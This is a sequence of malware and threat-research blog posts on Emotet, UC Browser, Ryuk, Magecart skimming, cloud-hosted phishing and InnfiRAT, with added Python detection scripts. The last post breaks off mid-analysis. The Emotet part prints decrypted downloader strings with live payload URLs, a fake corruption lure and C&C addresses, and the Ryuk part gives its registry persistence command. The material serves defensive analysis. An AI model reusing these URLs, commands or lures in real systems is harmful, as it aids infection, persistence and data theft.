WScript.Shell
ResponseBody
ActiveXObject
https://www.marquedafrique.com/k9c5qh/eb1wiw8192/
Scripting.FileSystemObject
CreateObject
https://thecrystaltrees.com/nofij3ksa/o5523/
http://4excellent.com/wp-includes/ii950106/
WScript.Shell
Popup
MSXML2.XMLHTTP
GET
open
send
http://www.davidleighlaw.com/wp-content/wlfsj15707/
Position
Open
Type
SaveToFile
random
toString
substr
0|1|3|4|2
11|15|13|4|6|9|8|7|5|0|2|3|1|10|16|14|12
return (function()
{}.constructor("return this")( )
7|2|8|0|5|1|4|6|3
2|0|3|4|1
0|14|11|8|3|6|13|9|5|2|1|12|4|10|7
Not Supported File Format
There was an error opening this document. The file is damaged and could not be repaired (for example, it was sent as an email attachment and wasn't correctly decoded).
The script's functionality can be clearly determined from the decrypted strings. It downloads, saves, and runs its payload from a list of URLs and shows the following message box to trick a user into believing the file is corrupt:
Figure 13: An error message to trick a user into believing the file is corrupt.
There are multiple URLs embedded in the script files. The following URLs were extracted from this script:
http://thewomentour[.]com/wp-includes/f8yezb9/
https://www[.]marquedafrique[.]com/k9c5qh/eb1wiw8192/
https://thecrystaltrees[.]com/nofij3ksa/o5523/
http://4excellent[.]com/wp-includes/ii950106/
http://www[.]davidleighlaw[.]com/wp-content/wlfsj15707/
In this case, the Emotet loader is downloaded from “http://thecrystaltrees[.]com/nofij3ksa/o5523/” (MD5 – 402b20268d64acded1c48ce760c76c47).
The Emotet loader already has been extensively analyzed and blogged about, so we won't be getting into technical details of the loader here. Below are artifacts extracted from this sample:
RSA key extracted from this sample:
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOzoTryw1r9RxRJPFKalO4+q7JaDZWSB
KZlEc22H6ITuE06tvJspue42TF1yk8xN+1bqW++QeV6Clm1uRswA/qoao/6p4eN0
h4zIO8PEaJ0C/9EO4cx9yfRLlVpjdEkP0QIDAQAB
-----END PUBLIC KEY-----
C&C server addresses from the sample:
187[.]188[.]166[.]192:80,
200[.]57[.]102[.]71:8443,
200[.]21[.]90[.]6:8080,
46[.]41[.]134[.]46:8080,
178[.]249[.]187[.]151:8080,
217[.]199[.]160[.]224:8080,
71[.]244[.]60[.]230:7080,
119[.]59[.]124[.]163:8080,
185[.]86[.]148[.]222:8080,
190[.]230[.]60[.]129:80,
178[.]79[.]163[.]131:8080,
186[.]83[.]133[.]253:8080,
179[.]62[.]18[.]56:443,
91[.]205[.]215[.]57:7080,
217[.]113[.]27[.]158:443,
181[.]36[.]42[.]205:443,
190[.]19[.]42[.]131:80,
183[.]82[.]97[.]25:80,
77[.]245[.]101[.]134:8080,
109[.]104[.]79[.]48:8080,
159[.]203[.]204[.]126:8080,
5[.]77[.]13[.]70:80,
189[.]187[.]141[.]15:50000,
46[.]28[.]111[.]142:7080,
46[.]21[.]105[.]59:8080,
189[.]166[.]68[.]89:443,
183[.]87[.]87[.]73:80,
190[.]200[.]64[.]180:7080,
79[.]143[.]182[.]254:8080,
119[.]92[.]51[.]40:8080,
187[.]155[.]233[.]46:443,
89[.]188[.]124[.]145:443,
201[.]163[.]74[.]202:443,
62[.]75[.]160[.]178:8080,
51[.]15[.]8[.]192:8080,
46[.]29[.]183[.]211:8080,
62[.]75[.]143[.]100:7080,
114[.]79[.]134[.]129:443,
190[.]230[.]60[.]129:80,
190[.]117[.]206[.]153:443,
203[.]25[.]159[.]3:8080,
217[.]199[.]175[.]216:8080,
80[.]85[.]87[.]122:8080,
190[.]1[.]37[.]125:443,
23[.]92[.]22[.]225:7080,
81[.]169[.]140[.]14:443,
46[.]163[.]144[.]228:80,
5[.]196[.]35[.]138:7080,
189[.]129[.]4[.]186:80,
151[.]80[.]142[.]33:80,
190[.]221[.]50[.]210:8080,
190[.]104[.]253[.]234:990,
71[.]244[.]60[.]231:7080,
91[.]83[.]93[.]124:7080,
181[.]81[.]143[.]108:80,
181[.]188[.]149[.]134:80,
50[.]28[.]51[.]143:8080,
123[.]168[.]4[.]66:22,
211[.]229[.]116[.]97:80,
201[.]184[.]65[.]229:80,
77[.]55[.]211[.]77:8080,
212[.]71[.]237[.]140:8080,
190[.]38[.]14[.]52:80,
46[.]41[.]151[.]103:8080,
149[.]62[.]173[.]247:8080,
87[.]106[.]77[.]40:7080,
86[.]42[.]166[.]147:80,
109[.]169[.]86[.]13:8080,
88[.]250[.]223[.]190:8080,
138[.]68[.]106[.]4:7080,
200[.]58[.]171[.]51:80
Conclusion
Emotet is an ever-evolving threat, employing new tricks and tactics. Although it started as a banking trojan, Emotet is now associated with several different malware campaigns, including ransomware and infostealers. The Zscaler ThreatLabZ team proactively tracks and ensures coverage to block downloaders, payloads, and C&C activity from Emotet and other threats.
ThreatLabZ is the research division of Zscaler. To learn more about ThreatLabZ and Zscaler cloud activity, visit https://www.zscaler.com/threatlabz/cloud-activity-dashboard
UC Browser app abuses may have exposed 500 million users
Recently, when examining the Zscaler cloud for unusual activity, ThreatLabZ researchers found some questionable hits in relation to a particular domain: 9appsdownloading[.]com. Upon analysis, we found these requests being made from a popular browser that's available on Google Play and has more than 500 million downloads to date: the UC Browser app.
Fig. 1: UC Browser on Google Play
As we began to analyze the UC Browser app, we found that the requests were being made to download an additional Android Package Kit (APK) over an unsecured channel (plain HTTP instead of HTTPS). Downloading and/or updating components from a third-party source violates Google Play policy, which states: “An app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play.”
We decided to explore further into the UC Browser app and found the following issues, which will be discussed in detail in this blog:
Downloading an additional APK from a third party – in violation of Google Play policy
Communication over an unsecured channel – opening doors to man-in-the-middle attacks
Dropping an APK on external storage (/storage/emulated/0) – allowing other apps, with appropriate permissions, to tamper with the APK
We found another app called UC Browser Mini from the same developer with the same functionality and issues, and it dropped the same additional APK from a remote server. The screenshot below shows UC Mini on Google Play.
Fig. 2: UC Browser Mini (UC Mini)
It is important to note that these issues have the potential to affect millions of Android users because the UC Browser app has been downloaded 500 million+ times and UC Mini has been downloaded 100 million+ times. The ThreatLabZ team has been in contact with Google, whose teams are investigating the apps.
Timeline:
August 13, 2019: Zscaler reported policy violation to Google.
August 13, 2019: Google promptly responded. Case assigned to an investigation team.
August 13 – September 25, 2019: Follow-up emails with research details.
September 27, 2019: Google confirmed policy violation by UC Browser and UC Mini. Google contacted UC developers to update the apps and remediate the policy violation.
Update: After Google's intervention, the Zscaler research team noticed that the latest version of both the apps, UC Browser and UC Mini, have stopped downloading the third-party app store.
Technical Details of UC Browser
Name: UC Browser
Package Name: com.UCMobile.intl
Installs: 500,000,000+ (500M+)
Developer: UCWeb Singapore Pte. Ltd.
1. Downloading an APK from a third party
Upon finding the UC Browser app as the main culprit, we decided to dig deeper into our analysis of the app. As soon as the app is installed, it displays basic activities (Android screens) to set up default language, topics of interest, location, and so on.
Fig. 3: UC Browser app icon and initial Android activity
After some initial requests for news and notifications, the app sends multiple requests with redirections and finally drops an APK on to the user’s device. The screenshot below illustrates the chain of requests and redirects taking place:
Fig. 4 Unsecured requests for APK download
This functionality of dropping another APK from a third-party source clearly violates Google Play’s policy, which includes the following:
“An app distributed via Google Play may not modify, replace, or update itself using any method other than Google Play's update mechanism. Likewise, an app may not download executable code (e.g., dex, JAR, .so files) from a source other than Google Play. This restriction does not apply to code that runs in a virtual machine and has limited access to Android APIs (such as JavaScript in a webview or browser).”
During our analysis, we found the APK being dropped on external storage but we did not find the APK being installed. It is possible that this functionality is still under development or there may be other reasons it wasn’t installed, such as an exception, a disabled unknown-sources option, or a rooted device.
2. Communication over an unsecured channel
The APK was downloaded over an unsecured channel (plain HTTP instead of HTTPS), opening the possibility for man-in-the-middle (MiTM) attacks. In our research, we came across a recent Dr. Web blog post that talks about similar issues they saw with UC Browser downloading and installing libraries from remote servers. In that case, they talk about libraries being downloaded over HTTP and, in our case, we saw a completely new APK being dropped (this APK is also analyzed in the latter part of this blog).
The consequences of downloading and installing components over unsecured channels were well addressed in the Dr. Web blog, along with the MiTM vulnerability, so we will not address those issues further.
We noticed that the app analyzed by Dr. Web researchers had the same icon as our sample, but had a different full-name and a different developer. The screenshots below show the Dr. Web sample (left) compared to the Zscaler sample (right):
Fig. 5: UC Browser app samples: Dr. Web (left) and Zscaler (right)
It could be that the same app had been uploaded again on Google Play with a different name and developer along with modified or enhanced code to download additional APKs.
3. Dropping an APK on external storage
We also noticed that the additional APK being dropped by this app is stored on external storage, which is world-readable by default. The screenshot below shows the location of the dropped APK:
Fig. 6: Dropped APK storage location
Because the APK is placed on external storage, any other app holding the storage permission (android.permission.READ_EXTERNAL_STORAGE / android.permission.WRITE_EXTERNAL_STORAGE) can access this location and tamper with the downloaded APK before it is used.
Analysis of the dropped APK
During our analysis, we noted that UC Browser was dropping the APK but not installing it. It is unclear whether this is due to the fact that the functionality is still under development or if there is another reason the APK is not installing. But we did want to find out what the APK contained, so we decided to manually install it and have a look inside. To our surprise, we found that the APK was actually a third-party app store named “9 Apps” with the package name com.mobile.indiapp.
Fig. 7: 9Apps app install process
After installing the app, it scans the device for installed apps. The app’s scanning and further activities can be seen in the screenshots below:
Fig. 8: 9Apps initial activities
We also saw several adult apps available for download in this third-party app store. These apps can be seen in the screenshot below:
Fig. 9: Adult apps on 9Apps store
We tried downloading a small-sized app from the 9Apps store and, to our surprise, the app was downloaded from 9appsdownloading[.]com. This is the same domain that we mentioned at the beginning of this blog. The screenshot below shows the functionality in action:
Fig. 10: Sample APK download requests
Further scrutiny of Zscaler cloud traffic showed multiple requests for APK downloads from this 9appsdownloading[.]com domain. Within the last month, we found 130+ such requests. The hits can be seen in the Zscaler cloud dashboard:
Fig. 11: Zscaler dashboard showing the domain’s activity
Conclusion
The tactics used by UC Browser and UC Mini violate Google Play security policies and make it possible for any malicious app to gain entry into a user's device. While 9Apps, an app store for Android apps, is not a malicious site, we searched the domain using VirusTotal, which showed a number of detections:
Fig. 12: VirusTotal search for the domain
It is too early to determine exactly what the UC Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat.
Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications. The UC Browser app’s use of unsecured channels also allows attackers to install an arbitrary payload on a device that can perform a variety of activities, such as display phishing messages designed to steal personal data, including usernames, passwords, and credit card numbers.
Once a user device has been compromised, and that compromised device connects back at the office, attackers have the ability to establish a foothold in your network, so they can snoop, spread malware, or steal data.
Examining the Ryuk Ransomware
Ryuk ransomware had a disturbingly successful debut, being used to hit at least three organizations in its first two months of activity for more than $640,000 in ransom. Several attacks followed, where the attackers demanded even greater amounts of ransom.
The attackers were able to demand and receive high ransoms because of a unique trait in the Ryuk code: the ability to identify and encrypt network drives and resources, as well as delete shadow copies on the endpoint. By carrying out these actions, the attackers could disable the Windows System Restore option, making it impossible for users to recover from the attack without external backups.
Unlike other ransomware, Ryuk is distributed by common botnets, such as Trickbot and Emotet, which have been widely used as banking trojans. In this blog, we'll provide an analysis of how the Ryuk ransomware can encrypt a victim's data while blocking the infected system from restoring the data.
Analysis
Ryuk dropper contains both 32-bit and 64-bit payloads. The dropper checks to see if it is being executed in a 32-bit or 64-bit OS using the "IsWow64Process" API and drops the payload accordingly. It also checks the version of the operating system. If it is executed in Windows XP, it drops the Ryuk payload at "C:\Documents and Settings\Default User\{random-5 char}.exe". If it is executed in Windows Vista or later versions of Windows, it drops the file at "C:\users\Public\{random-5 char}.exe”. Next, it executes the payload using the ShellExecuteW API.
Persistence mechanism
Ryuk adds the following registry key so it will execute at every login. It uses the command below to create a registry key:
"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Public\{random-5 char}.exe" /f
Process injection
Ryuk injects its main code into several remote processes. It enumerates running processes by calling the CreateToolhelp32Snapshot API and injects its code into every process except those named explorer.exe, lsass.exe and csrss.exe, and any process running under the NT AUTHORITY account.
Ryuk ransomware terminates processes and stops services contained on a predefined list. These processes and services are mostly antivirus tools, databases, backups, and other software. The screenshot below shows the list of services stopped by Ryuk.
Figure 1: The list of services disabled by the Ryuk ransomware.
The screenshot below shows the list of processes terminated by Ryuk.
Figure 2: The list of processes terminated by the Ryuk ransomware.
Ryuk also deletes shadow copies and other backup storage files by using a .BAT file so that the infected system can’t restore data. Below is the list of commands used by Ryuk to perform these deletions.
Figure 3: The list of commands used by Ryuk ransomware to delete shadow copies and other backup storage files.
Encryption and similarity with Hermes ransomware
Ryuk uses a combination of RSA (asymmetric) and AES (symmetric) encryption to encrypt files. Ryuk embeds an RSA key pair in which the RSA private key is already encrypted with a global RSA public key. The sample generates an AES-256 key for each file and encrypts the files with an AES key. Further, the AES key is encrypted with an embedded public key and is appended at the end of the encrypted file. If all the samples contain the same RSA key pair, then after getting access to one private key, it's easy to decrypt all of the files. But Ryuk contains a different RSA key pair for every sample. Some samples append the ".RYK" extension and some don't append any extensions after encrypting the files.
Ryuk has a common feature with Hermes ransomware. During encryption, Ryuk adds a marker in the encrypted file using the keyword “HERMES”. Ryuk checks for the HERMES marker before encrypting any file to know if it has been already encrypted. The screenshot below displays the HERMES marker and encrypted AES key appended at the end of the encrypted file.
Figure 4: The HERMES marker and the encrypted AES key.
Ryuk encrypts files on every drive and network share reachable from the infected system. It has whitelisted a few folders, including “Windows, Mozilla, Chrome, Recycle Bin, and Ahnlab”, so it won’t encrypt files inside these folders. Ryuk drops its ransom note, named RyukReadMe.txt, in every directory. Ryuk asks for the ransom in bitcoin, providing the bitcoin address in the ransom note. Ryuk contains different templates for the ransom note. Below is a screenshot of the RyukReadMe.txt file.
Figure 5: Ryuk ransomware ransom note.
After completing the encryption, Ryuk creates two files. One is “Public” and contains an RSA public key while the second is “UNIQUE_ID_DO_NOT_REMOVE” and contains a unique hardcoded key.
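The artefacts described above (the HERMES marker in the tail of each encrypted file, the optional .RYK extension, the per-directory RyukReadMe.txt note and the Public / UNIQUE_ID_DO_NOT_REMOVE files) are enough to scope an infection during incident response. The following triage script is an added example, not Zscaler's or Ryuk's code; it assumes the marker sits within the last 1 KB of a file (the post does not give an offset) and builds its own constructed sample tree.

```python
import os
import tempfile
from pathlib import Path

HERMES_MARKER = b"HERMES"
# The post shows the marker and the RSA-encrypted AES key appended at the end
# of an encrypted file but gives no offset, so we scan the last TAIL_BYTES
# of each file (assumption for this example).
TAIL_BYTES = 1024
RYUK_EXT = ".RYK"
RANSOM_NOTE = "RyukReadMe.txt"
KEY_ARTIFACTS = {"Public", "UNIQUE_ID_DO_NOT_REMOVE"}
# Folder names the post says Ryuk leaves alone; skipping them keeps the
# triage focused on data Ryuk would actually have touched.
SKIPPED_DIRS = {"windows", "mozilla", "chrome", "recycle bin", "ahnlab"}


def has_hermes_marker(path) -> bool:
    """True if the HERMES marker appears in the file's tail."""
    try:
        size = os.path.getsize(path)
        with open(path, "rb") as fh:
            fh.seek(max(0, size - TAIL_BYTES))
            return HERMES_MARKER in fh.read()
    except OSError:
        return False


def triage(root) -> dict:
    """Walk root and bucket files by the Ryuk artefact they exhibit."""
    summary = {"encrypted": [], "unmarked_ryk": [],
               "ransom_notes": [], "key_artifacts": []}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d.lower() not in SKIPPED_DIRS]
        for name in filenames:
            full = os.path.join(dirpath, name)
            if name == RANSOM_NOTE:
                summary["ransom_notes"].append(full)
            elif name in KEY_ARTIFACTS:
                summary["key_artifacts"].append(full)
            elif has_hermes_marker(full):
                summary["encrypted"].append(full)
            elif name.upper().endswith(RYUK_EXT):
                # Extension added but no marker: likely a partial write,
                # worth a manual look rather than being counted as encrypted.
                summary["unmarked_ryk"].append(full)
    return summary


def build_sample_tree(base) -> None:
    """Constructed sample data mimicking a post-Ryuk file system."""
    base = Path(base)
    (base / "docs").mkdir()
    fake_key_blob = bytes(range(256))  # stands in for the RSA-encrypted AES key
    (base / "docs" / "report.docx.RYK").write_bytes(
        b"\x00" * 4096 + HERMES_MARKER + fake_key_blob)
    # Some samples add no extension, so the marker is the reliable signal
    (base / "docs" / "budget.xlsx").write_bytes(
        b"\x01" * 100 + HERMES_MARKER + fake_key_blob)
    (base / "docs" / "photo.jpg.RYK").write_bytes(b"\x02" * 50)  # no marker
    (base / "docs" / "notes.txt").write_bytes(b"plain text, untouched")
    (base / "docs" / RANSOM_NOTE).write_text("ransom note placeholder")
    (base / "Windows").mkdir()
    (base / "Windows" / "sys.dll").write_bytes(HERMES_MARKER)  # whitelisted dir
    (base / "UNIQUE_ID_DO_NOT_REMOVE").write_bytes(b"\x00" * 32)
    (base / "Public").write_bytes(b"public key placeholder")


def run_demo() -> dict:
    """Triage the constructed tree and return per-bucket counts."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        summary = triage(tmp)
    return {bucket: len(paths) for bucket, paths in summary.items()}


if __name__ == "__main__":
    print(run_demo())
```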
Conclusion
While most ransomware is spread using spam email and exploit kits, Ryuk is delivered as a payload of the Emotet and Trickbot malware. Looking at the encryption process and ransom demands, Ryuk is targeting big enterprises in the hopes of large payoffs. Zscaler ThreatLabZ team continues to monitor this threat to ensure that Zscaler customers are protected.
IOCs
MD5
5AC0F050F93F86E69026FAEA1FBB4450
6CDCB9F86972EFC4CFCE4B06B6BE053A
31BD0F224E7E74EEE2847F43AAE23974
Rajdeepsinh Dodia and Amandeep Kumar are security researchers on the Zscaler ThreatLabZ team.
Magecart hits again, leveraging compromised sites and newly registered domains
During alert monitoring, ThreatLabZ researchers came across multiple cases of shopping sites being compromised and injected with a skimming script. This injected script looks for the payment method and personally identifiable information (PII) and captures supplied financial information which is then sent to an adversary-controlled gate server even before the user hits the submit form. There have been multiple reports published related to Magecart activity, and ThreatLabZ has blogged about the hacker group’s activities in the past. (Read previous blogs from September 2018 and July 2019.)
In this blog, we will provide an overview of the current skimming campaigns with an analysis of those that use compromised sites to host the skimmer code and those that use newly registered domains.
The following screen capture shows the Magecart hits we observed over the last 90 days. The activity appears to be fairly consistent week to week, with a spike at the end of the analysis period, and we believe it is likely to continue.
Figure 1: Hits on compromised sites over 90 days (x-axis=date, y-axis=hits)
Most of the impacted websites are in the shopping category. The following graph shows the cloud-wide statistic for the number of unique domains per category for the sites impacted.
Figure 2: URL categories of impacted sites (x-axis=URL category, y-axis=unique domain counts)
This Magecart-based skimming campaign did not reveal any novel tactics, tools, or procedures, but it seems to be more structured in terms of the scripts being used across multiple compromises, similar gate URL parameter patterns, and the algorithm used for data encoding.
The cycles we observed were generally the same, but we did see some differences. Some use obfuscation to hide the script injection code and use another compromised site for hosting the skimmer script, while others make use of newly registered domains for skimmer script hosting. Regardless of the loading script, the skimmer code possesses little to no obfuscation.
Cycle 1:
Compromised site loads skimmer code from another compromised site
The following image shows a Fiddler session to demonstrate the skimming chain.
Figure 3: Fiddler session for Magecart skimming
In these skimming campaigns, we can see compromised sites sending captured payment information to domains that are either newly registered or compromised and under the control of an adversary. In the following example, the gate site is compromised as well and was registered on 2013-03-19.
Figure 4: Example of injected script and skimmer code
The way this skimmer code operates is to wait for the user to fill in the personal information and payment method and capture it all before the user hits the submit button. This captured information is then encoded using the Base64 algorithm and sent to the gate URL in a GET request.
Figure 5: Skimmer script sending base64 encoded PII and Payment Information GET Request
Cycle 2:
Compromised site loads skimmer code from a newly registered domain
As shown in the image below, the skimming script is being hosted on a domain registered just 10 days before this analysis.
Figure 6: Compromised site leveraging skimmer script from a newly registered domain
All the skimmer scripts we’ve identified so far are similar, and we observed the following common gate URL pattern:
hxxps://domain/{path}.(php|js)?hash=[base64data]
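Because the skimmer sends the captured form data base64-encoded in a GET request to a gate URL of this shape, outbound proxy logs are a practical place to catch it. The scanner below is an added example (not Zscaler's code): it matches the gate pattern, decodes the hash parameter and flags payloads that contain checkout-field names or a Luhn-valid card number; the log format, the gate.example host and the PII field list are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Gate URL pattern from the post: hxxps://domain/{path}.(php|js)?hash=[base64data]
GATE_PATH_RE = re.compile(r"\.(?:php|js)$", re.IGNORECASE)

# Form-field name fragments a checkout skimmer is likely to capture
# (assumption for this example).
PII_HINTS = ("card", "cvv", "expir", "email", "phone", "address", "name")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, used to tell a card number from any other digit run."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def decode_hash_param(value: str):
    """Base64-decode the hash= value; None if it is not valid base64."""
    # parse_qs turns '+' into ' '; base64 never contains spaces, so undo that
    value = value.replace(" ", "+")
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_request(url: str):
    """Return a finding for a gate-pattern request carrying PII-like data."""
    parts = urlsplit(url)
    if not GATE_PATH_RE.search(parts.path):
        return None
    hashes = parse_qs(parts.query).get("hash")
    if not hashes:
        return None
    decoded = decode_hash_param(hashes[0])
    if decoded is None:
        return None
    lowered = decoded.lower()
    fields = [h for h in PII_HINTS if h in lowered]
    pans = [run for run in re.findall(r"\d{13,19}", decoded) if luhn_ok(run)]
    if not fields and not pans:
        return None
    return {"host": parts.hostname, "path": parts.path,
            "pii_fields": fields, "card_numbers": len(pans)}


def scan_log(lines):
    """Run inspect_request over log lines of the form '<ts> <client> GET <url>'."""
    findings = []
    for line in lines:
        cols = line.split()
        if len(cols) < 4 or cols[2] != "GET":
            continue
        finding = inspect_request(cols[3])
        if finding:
            findings.append(finding)
    return findings


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed sample log: one skimmer exfiltration request (using the standard
# 4111... test card number), one benign cache-busting request, one unrelated hit.
SAMPLE_LOG = [
    "2019-10-01T12:00:01Z 10.0.0.5 GET https://gate.example/js/loader.php?hash="
    + _b64("card=4111111111111111&cvv=123&email=jane@example.com"),
    "2019-10-01T12:00:02Z 10.0.0.5 GET https://cdn.example/lib/app.js?hash="
    + _b64("v=2.1"),
    "2019-10-01T12:00:03Z 10.0.0.6 GET https://shop.example/checkout",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```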
Figure 7: Skimmer script differences
We saw multiple cases where the same skimmer code locations were being used in multiple compromised sites, including:
custommagnetsdirect[dot]com/catalog/view/javascript/jquery/jquery.sticky.js
matteola[dot]com/js/varien/js.js
The image below shows examples of skimmer code locations being used for multiple compromised sites.
Figure 8: The same skimmer code locations used in multiple compromised sites
Conclusion
Magecart has been successful for years because attackers have improved their techniques for injecting malicious code and hiding it from detection. Now, we are seeing attackers able to steal payment card information before it is even submitted. Zscaler ThreatLabZ actively tracks such campaigns and protects customers from skimming and other types of data-stealing attacks.
Appendix
Common skimmer JS URL patterns
Bad domains (with creation dates)
Phishing attacks abusing appspot.com and web.app domains on Google Cloud
In July, Zscaler ThreatLabZ posted a blog about a rise in the use of Microsoft Azure domains to host phishing attacks. Our researchers recently detected similar activity on the Google domains Appspot.com and Web.app. Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Web.app is a mobile platform used for building mobile apps hosted by Firebase, which is Google’s mobile app platform.
These campaigns use SSL certificates issued by Appspot.com and Web.app, and they have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server.
In the analysis that follows, we’ll describe the techniques these campaigns use to avoid detection and we’ll show the phishing domains and the locations where the user credentials are being sent.
As of this date, many of these subdomains on appspot.com and web.app are not being flagged by VirusTotal.
Fig 1: VirusTotal detections for the subdomains
Web.app hosted phishing pages
The following screenshots are phishing pages of some of the sites that have used an SSL certificate issued by Web.app.
Fig 2: Microsoft login phishing page
Fig 3: SSL certificate page of the hosted phishing URL
Appspot.com hosted phishing pages
Fig 4: Google Drive login phishing page
Fig 5: Outlook login phishing page
Fig 6: Dropbox login phishing page
Fig 7: DocuSign login phishing page
Fig 8: OneDrive login phishing page
Fig 9: OneDrive login phishing page
Fig 10: OneDrive login phishing page
Evasion techniques
This is a sophisticated phishing campaign as demonstrated by the well-designed phishing pages that are difficult to distinguish from legitimate pages.
In addition, the attackers are using the latest tactics to evade detection from scan engines, with most of the code written in an external JavaScript file. This filename is 32 characters long and different for every site.
Below is the source code of the phishing pages; the highlighted part is the external JavaScript mentioned above.
Fig 11: Source code of phishing page
Fig 12: Source code of phishing page
In the above landing page source code of the phishing URL, there is less content, no brand name, and no catchy strings that are common in most phishing campaigns. This enables it to bypass many automatic analysis engines and extend its survival.
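The traits just described (a near-empty landing page with no brand strings, logic moved into a 32-character randomly named external JavaScript file, hosting on an appspot.com or web.app subdomain) can be turned into a simple page-scoring heuristic. The scorer below is an added example, not Zscaler's detection logic; the 200-character text threshold, the alphanumeric filename assumption and both sample pages are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

CLOUD_HOSTS = (".appspot.com", ".web.app")
# The post notes the external JavaScript name is 32 characters long and
# differs per site; the alphanumeric character set is an assumption.
RANDOM_JS_RE = re.compile(r"^[A-Za-z0-9]{32}\.js$")
MIN_TEXT_LEN = 200  # below this the landing page is treated as near-empty (assumption)


class PageFeatures(HTMLParser):
    """Collect visible text length and external script sources from HTML."""

    def __init__(self):
        super().__init__()
        self.text_len = 0
        self.scripts = []
        self._skip = False  # inside <script> or <style>, not visible text

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(src)
        if tag in ("script", "style"):
            self._skip = True

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:
            self.text_len += len(data.strip())


def score_page(url: str, html: str) -> dict:
    """Flag a page that combines at least two of the traits from the post."""
    feats = PageFeatures()
    feats.feed(html)
    host = (urlsplit(url).hostname or "").lower()
    reasons = []
    if host.endswith(CLOUD_HOSTS):
        reasons.append("served from an appspot.com/web.app subdomain")
    random_js = [s for s in feats.scripts
                 if RANDOM_JS_RE.match(s.rsplit("/", 1)[-1])]
    if random_js:
        reasons.append("loads a 32-character randomly named external script")
    if feats.text_len < MIN_TEXT_LEN and feats.scripts:
        reasons.append("near-empty landing page whose logic lives in external JS")
    # A lone appspot/web.app host is normal for legitimate apps, so require
    # two independent signals before calling the page suspicious.
    return {"suspicious": len(reasons) >= 2, "reasons": reasons,
            "text_len": feats.text_len, "scripts": feats.scripts}


# Constructed sample pages (not taken from the post).
PHISH_HTML = """<html><head><title>Sign in</title></head><body>
<div id="app"></div>
<script src="a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6.js"></script>
</body></html>"""

BENIGN_HTML = ("<html><head><title>Team wiki</title></head><body>"
               "<h1>Team wiki</h1><p>" + "Meeting notes and project status. " * 10
               + "</p><script src=\"/static/app.js\"></script></body></html>")

if __name__ == "__main__":
    print(score_page("https://login-xyz.appspot.com/", PHISH_HTML))
    print(score_page("https://wiki.example.com/", BENIGN_HTML))
```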
The following screenshots show the code and the location where the user credentials are being sent. This code is present in randomly named, externally added JavaScript files.
Fig 13: Location used by the attacker to collect user credentials
Fig 14: Location used by the attacker to collect user credentials
The following figure shows a sample packet capture for this data being sent to the attacker’s site.
Fig 15: Packet capture for the data that has been sent to the attacker’s site
Zscaler is actively blocking these phishing pages. The following screen capture shows Zscaler detection for one of these pages:
Fig 16: Zscaler successfully detects these domains
Phishing domains
As of the writing of this blog, we have collected the following phishing domains.
Where information is sent
Below are the locations where the phishing page is sending credentials entered by the user.
InnfiRAT: A new RAT aiming for your cryptocurrency and more
Recently, the Zscaler ThreatLabZ team came across a new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine. This blog provides an analysis of this new RAT, including the way it communicates, all the tasks it performs, and the information it steals.
Background
As with just about every piece of malware, InnfiRAT is designed to access and steal personal information on a user's computer. Among other things, InnfiRAT is written to look for cryptocurrency wallet information, such as Bitcoin and Litecoin. InnfiRAT also grabs browser cookies to steal stored usernames and passwords, as well as session data. In addition, this RAT has ScreenShot functionality so it can grab information from open windows. For example, if the user is reading email, the malware takes a screenshot. It also checks for other applications running on the system, such as an active antivirus program.
InnfiRAT sends the data it has collected to its command-and-control (C&C) server and requests further instructions. The C&C can also instruct the malware to download additional payloads onto the infected system.
Technical analysis
1) Before executing the main payload, the malware first checks whether it is running from the %AppData% directory under the name NvidiaDriver.exe. If not, a web request is sent to “iplogger[.]com/1HEt47" (possibly to check network connectivity).
2) It records all the running processes in an array, then iterates through each process and checks whether any process is running with the name NvidiaDriver.exe. If so, the malware kills that process and waits for it to exit.
Figure 1: Checks execution location, terminates process with name NvidiaDriver
3) InnfiRAT copies itself as %AppData%/NvidiaDriver.exe and executes it from %AppData% before terminating the current process.
Figure 2: The malware makes a copy of itself in %AppData%
4) After confirming the path of file execution, it writes a Base64 encoded PE file in memory, which is later decoded in its actual format and is loaded after changing the entry point of the file. This is also a .NET executable and contains the actual functionality of the malware.
Figure 3: Embedded PE file in encoded form
Figure 4: Embedded PE file is decoded and executed
Analysis of embedded .NET executable
All the strings inside the file are encoded with a custom encoding scheme that utilizes the XOR operation.
Figure 5: Strings decoding logic
As the execution of the malware starts, it checks for the presence of VM environment. It does so by checking the return value from the routine JкыnеюwPреюLLщzьhdкXoJxбюHхрйFWрDлнруG7574208083337. If the return value is equal to the first value, enum[0], defined in the enum shown below, then it continues the execution or else it terminates.
Figure 6: User-defined enum structure
